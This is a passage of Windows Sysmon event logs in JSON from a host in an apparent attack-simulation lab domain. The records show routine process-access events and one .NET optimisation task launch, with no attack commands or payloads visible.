C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6129,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6130,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6131,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6132,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6133,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6134,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010032A0B00}\r\nTargetProcessId: 4940\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010032A0B00}","TargetProcessId":"4940","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6135,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010032A0B00}\r\nSourceProcessId: 4940\r\nSourceThreadId: 5104\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-001064290B00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010032A0B00}","SourceProcessId":"4940","SourceThreadId":"5104","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-001064290B00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6136,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.811\r\nProcessGuid: {A837DB8D-040E-5F25-0000-0010A12C0B00}\r\nProcessId: 3344\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Microsoft .NET Framework optimization service\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: NGenTask.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:392\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\r\nParentProcessGuid: {A837DB8D-040E-5F25-0000-0010DF220B00}\r\nParentProcessId: 2360\r\nParentImage: C:\\Windows\\System32\\taskhostw.exe\r\nParentCommandLine: taskhostw.exe /RuntimeWide","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.811","ProcessGuid":"{A837DB8D-040E-5F25-0000-0010A12C0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Microsoft .NET Framework optimization service","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"NGenTask.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:392","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","ParentProcessGuid":"{A837DB8D-040E-5F25-0000-0010DF220B00}","ParentProcessId":"2360","ParentImage":"C:\\Windows\\System32\\taskhostw.exe","ParentCommandLine":"taskhostw.exe /RuntimeWide","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
